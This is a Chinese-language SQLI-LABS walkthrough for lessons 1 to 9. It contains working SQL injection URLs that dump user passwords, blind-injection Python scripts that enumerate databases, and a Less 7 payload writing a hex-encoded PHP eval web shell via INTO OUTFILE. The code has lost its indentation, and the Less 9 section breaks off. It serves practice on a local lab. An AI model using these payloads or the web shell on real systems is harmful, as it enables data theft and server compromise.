SqliLab 题解

SqliLab 每日一注

介绍

SQLI-LABS 是一个 SQL 注入练习平台, 包含了基础的 sql 注入案例,挺好玩的
项目地址在这

安装

将源代码复制到 Apache webroot 文件夹(htddocs,/var/www)
打开 sql-connections 文件夹下的"db-creds.inc"文件
修改 mysql 用户名和密码为你自己的
打开浏览器,通过 localhost 的 index.html 访问文件夹
点击 setup/resetDB 就会在你的 mysql 中创造数据库
开始日站咯

Day1-Less1

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
select *,* from XX where id = '$id' LIMIT 0,1
select *,* from XX where id = '' or 1=1 limit 1,2--+' LIMIT 0,1
http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 3,4 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+


数据库版本: @@version
查看 MySQL 的当前用户 USER()
INFORMATION_SCHEMA.COLUMNS
INFORMATION_SCHEMA.TABLES


select *,* from XX where id = '

' LIMIT 0,1

http://localhost/sqllab/Less-1/?id=' or 1=(SELECT length(TABLE_NAME FROM) INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 0,1) --+

记录一下技巧
select group_concat(username) from users;
(sleep(ascii(mid(user()from(2)for(1)))=109))

比如在 mysql 中我们可以使用如下的经典语句进行报错。
select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

这是网上流传很广的一个版本,可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

如果关键的表被禁用了,可以使用这种形式
select count(*) from (select 1 union select null union select !1)x group by concat(version(),floor(rand(0)*2));

如果 rand 被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
其实这是 mysql 的一个 bug 所引起的,其他数据库都不会因为这个问题而报错。

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
from requests import get

def GuessDBLength():
print '[+]Guessing DBLength'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-1/?id=0' or length(database())=%d--+" %i)
html = r.text
if 'Your Login name' in html:
print ' [-]The DatabaseNameLength is', i
return i
i+=1

def GuessDBName(length):
print '[+]Guessing DBName'
name = ''
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-1/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
print ' [-]DBName is:', name
return name

def GuessTBsNum(name):
print '[+]Guessing Tables num'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
html = r.text
if 'Your Login name' in html:
print ' [-]The Tables num is', i
break
i+=1
return i

def GuessTBNameLenth(n, name):
print '[+]Guessing TableName Length'
i = 1
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The TableName Lenth is', i-1
return i-1
i+=1

def GuessTBsNames(num, DBName):
TBsNames = []
for no in range(num):
name = ''
length = GuessTBNameLenth(no, DBName)
print ' [-]Guessing Table Name'
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
TBsNames.append(name)
print ' [-]All Tables Names is:', TBsNames
return TBsNames

def GuessCLMNum(tname,dname):
print '[+]Guessing Colunms num'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Colunm num is', i
return i
i+=1

def GuessCLMLen(cnum, tname, dname):
i = 1
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Colunm Lenth is', i-1
return i-1
i+=1

def GuessCLMName(DBName, TNames):
for tname in TNames:
print '[+]Guessing Colunms for', tname
CLMNames = []
for cnum in range(GuessCLMNum(tname,DBName)):
length = GuessCLMLen(cnum, tname, DBName)
name = ''
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break

data = GuessDatas(DBName, tname, name)
CLMNames.append(name)
print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
i = 0
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Datas num is', i
return i
i+=1

def GuessDataLen(dname, tname, cname, n):
print ' [-]Guessing data length'
i = 1
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Data Lenth is', i-1
return i-1
i+=1

def GuessDatas(dname, tname, cname):
datanum = GuessDatasnum(dname, tname, cname)
Data = []
for no in range(datanum):
length = GuessDataLen(dname, tname, cname, no)
print ' [-]Guessing data'
name = ''
for i in xrange(length):
for n in xrange(127):
while 1:
try:
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
break
except:
print 'Relaxing...'
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
Data.append(name)
print ' [-]All Datas of %s is:' %cname, Data
return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day2-Less2

分析

1
2
3
4
5
6
select *,* from XX where id = $id LIMIT 0,1

select *,* from XX where id = 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+ LIMIT 0,1
http://localhost/sqllab/Less-1/?id= 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+


代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
from requests import get

def GuessDBLength():
print '[+]Guessing DBLength'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-2/?id=0 or length(database())=%d--+" %i)
html = r.text
if 'Your Login name' in html:
print ' [-]The DatabaseNameLength is', i
return i
i+=1

def GuessDBName(length):
print '[+]Guessing DBName'
name = ''
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-2/?id=0 or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
print ' [-]DBName is:', name
return name

def GuessTBsNum(name):
print '[+]Guessing Tables num'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
html = r.text
if 'Your Login name' in html:
print ' [-]The Tables num is', i
break
i+=1
return i

def GuessTBNameLenth(n, name):
print '[+]Guessing TableName Length'
i = 1
while 1:
r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The TableName Lenth is', i-1
return i-1
i+=1

def GuessTBsNames(num, DBName):
TBsNames = []
for no in range(num):
name = ''
length = GuessTBNameLenth(no, DBName)
print ' [-]Guessing Table Name'
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
TBsNames.append(name)
print ' [-]All Tables Names is:', TBsNames
return TBsNames

def GuessCLMNum(tname,dname):
print '[+]Guessing Colunms num'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Colunm num is', i
return i
i+=1

def GuessCLMLen(cnum, tname, dname):
i = 1
while 1:
r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Colunm Lenth is', i-1
return i-1
i+=1

def GuessCLMName(DBName, TNames):
for tname in TNames:
print '[+]Guessing Colunms for', tname
CLMNames = []
for cnum in range(GuessCLMNum(tname,DBName)):
length = GuessCLMLen(cnum, tname, DBName)
name = ''
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break

data = GuessDatas(DBName, tname, name)
CLMNames.append(name)
print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
i = 0
while 1:
r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Datas num is', i
return i
i+=1

def GuessDataLen(dname, tname, cname, n):
print ' [-]Guessing data length'
i = 1
while 1:
r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Data Lenth is', i-1
return i-1
i+=1

def GuessDatas(dname, tname, cname):
datanum = GuessDatasnum(dname, tname, cname)
Data = []
for no in range(datanum):
length = GuessDataLen(dname, tname, cname, no)
print ' [-]Guessing data'
name = ''
for i in xrange(length):
for n in xrange(127):
while 1:
try:
r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
break
except:
print 'Relaxing...'
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
Data.append(name)
print ' [-]All Datas of %s is:' %cname, Data
return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day3-Less3

分析

1
2
3
4
5
6
7
8
9
10
11
select *,* from XX where id = '($id)' LIMIT 0,1
select *,* from XX where id = ('$id') LIMIT 0,1

select *,* from XX where id = '(1)' LIMIT 0,1
select *,* from XX where id = '()' --+)' LIMIT 0,1
select *,* from XX where id = ('1') --+') LIMIT 0,1

select *,* from XX where id = ('
1') or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
') LIMIT 0,1

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
from requests import get

def GuessDBLength():
print '[+]Guessing DBLength'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-3/?id=0') or length(database())=%d--+" %i)
html = r.text
if 'Your Login name' in html:
print ' [-]The DatabaseNameLength is', i
return i
i+=1

def GuessDBName(length):
print '[+]Guessing DBName'
name = ''
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-3/?id=0') or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
print ' [-]DBName is:', name
return name

def GuessTBsNum(name):
print '[+]Guessing Tables num'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
html = r.text
if 'Your Login name' in html:
print ' [-]The Tables num is', i
break
i+=1
return i

def GuessTBNameLenth(n, name):
print '[+]Guessing TableName Length'
i = 1
while 1:
r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The TableName Lenth is', i-1
return i-1
i+=1

def GuessTBsNames(num, DBName):
TBsNames = []
for no in range(num):
name = ''
length = GuessTBNameLenth(no, DBName)
print ' [-]Guessing Table Name'
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
TBsNames.append(name)
print ' [-]All Tables Names is:', TBsNames
return TBsNames

def GuessCLMNum(tname,dname):
print '[+]Guessing Colunms num'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Colunm num is', i
return i
i+=1

def GuessCLMLen(cnum, tname, dname):
i = 1
while 1:
r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Colunm Lenth is', i-1
return i-1
i+=1

def GuessCLMName(DBName, TNames):
for tname in TNames:
print '[+]Guessing Colunms for', tname
CLMNames = []
for cnum in range(GuessCLMNum(tname,DBName)):
length = GuessCLMLen(cnum, tname, DBName)
name = ''
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break

data = GuessDatas(DBName, tname, name)
CLMNames.append(name)
print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
i = 0
while 1:
r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Datas num is', i
return i
i+=1

def GuessDataLen(dname, tname, cname, n):
print ' [-]Guessing data length'
i = 1
while 1:
r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Data Lenth is', i-1
return i-1
i+=1

def GuessDatas(dname, tname, cname):
datanum = GuessDatasnum(dname, tname, cname)
Data = []
for no in range(datanum):
length = GuessDataLen(dname, tname, cname, no)
print ' [-]Guessing data'
name = ''
for i in xrange(length):
for n in xrange(127):
while 1:
try:
r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
break
except:
print 'Relaxing...'
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
Data.append(name)
print ' [-]All Datas of %s is:' %cname, Data
return Data

DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day4-Less4

分析

1
2
3
4
5
6
7
8
select *,* from XX where id = "($id)" LIMIT 0,1
select *,* from XX where id = ("$id") LIMIT 0,1

select *,* from XX where id = ("") LIMIT 0,1

select *,* from XX where id = ("
1") or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
') LIMIT 0,1

Day5-Less5

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
select *,* from XX where id = '$id' LIMIT 0,1

select *,* from XX where id = '1' order by 3--+' LIMIT 0,1
3

' or 0 union all SELECT 0,1,2 FROM k--+
库名 security

concat(user(),floor(rand(0)*2))

select *,* from XX where id='
' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_NAME limit 102,1))) --+
' LIMIT 0,1

http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA limit 1,1)))

where extractvalue(1,concat('*',(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA='security' limit 2,1),'*'));

http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))) --+
遍历 0 即可
(extractvalue 有长度限制,最长 32 位)

或者
http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1) --+
(updatexml 有长度限制,最长 32 位)

或者
http://localhost/sqllab/Less-5/?id=' union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

或者
http://localhost/sqllab/Less-5/?id=' or 1 group by concat_ws('*',(select username from security.users limit 0,1),(select password from security.users limit 0,1),floor(rand(0)*2)) having min(0) --+

或者
http://localhost/sqllab/Less-5/?id=' union select (concat_ws('*', (select username from security.users limit 0,1),(select password from security.users limit 0,1), floor(rand(0)*2))), count(*), 3 from security.users group by 1 --+

Day6-Less6

分析

1
2
3
4
select *,* from XX where id = "$id" LIMIT 0,1

5
http://localhost/sqllab/Less-6/?id=" union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

Day7-Less7

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
select *,* from XX where id = (('$id')) LIMIT 0,1

http://localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt" --+

select id,username,password from users where id = (('
')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt"; --+
')) LIMIT 0,1

localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "1.txt"; --+

')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "/weshell.php" --+
')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "D:\\wamp\\www\\weshell.php" --+

由于没有返回值,php 没法取到,在源码的逻辑下会报错

Day8-Less8

分析

1
2
同 5

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
from requests import get

def GuessDBLength():
print '[+]Guessing DBLength'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-1/?id=0' or length(database())=%d--+" %i)
html = r.text
if 'Your Login name' in html:
print ' [-]The DatabaseNameLength is', i
return i
i+=1

def GuessDBName(length):
print '[+]Guessing DBName'
name = ''
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-1/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
print ' [-]DBName is:', name
return name

def GuessTBsNum(name):
print '[+]Guessing Tables num'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
html = r.text
if 'Your Login name' in html:
print ' [-]The Tables num is', i
break
i+=1
return i

def GuessTBNameLenth(n, name):
print '[+]Guessing TableName Length'
i = 1
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The TableName Lenth is', i-1
return i-1
i+=1

def GuessTBsNames(num, DBName):
TBsNames = []
for no in range(num):
name = ''
length = GuessTBNameLenth(no, DBName)
print ' [-]Guessing Table Name'
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
TBsNames.append(name)
print ' [-]All Tables Names is:', TBsNames
return TBsNames

def GuessCLMNum(tname,dname):
print '[+]Guessing Colunms num'
i = 0
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Colunm num is', i
return i
i+=1

def GuessCLMLen(cnum, tname, dname):
i = 1
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Colunm Lenth is', i-1
return i-1
i+=1

def GuessCLMName(DBName, TNames):
for tname in TNames:
print '[+]Guessing Colunms for', tname
CLMNames = []
for cnum in range(GuessCLMNum(tname,DBName)):
length = GuessCLMLen(cnum, tname, DBName)
name = ''
for i in xrange(length):
for n in xrange(127):
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break

data = GuessDatas(DBName, tname, name)
CLMNames.append(name)
print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
i = 0
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Datas num is', i
return i
i+=1

def GuessDataLen(dname, tname, cname, n):
print ' [-]Guessing data length'
i = 1
while 1:
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Data Lenth is', i-1
return i-1
i+=1

def GuessDatas(dname, tname, cname):
datanum = GuessDatasnum(dname, tname, cname)
Data = []
for no in range(datanum):
length = GuessDataLen(dname, tname, cname, no)
print ' [-]Guessing data'
name = ''
for i in xrange(length):
for n in xrange(127):
while 1:
try:
r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
break
except:
print 'Relaxing...'
html = r.text
if 'Your Login name' in html:
name += chr(n)
print ' [-]', name
break
Data.append(name)
print ' [-]All Datas of %s is:' %cname, Data
return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day9-Less9

分析

1
2
3
4
' or 1 union select 1,2,sleep(2) --+

0' or length(database())=8 --+
1' and length(database())=8 and sleep(2)--+

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
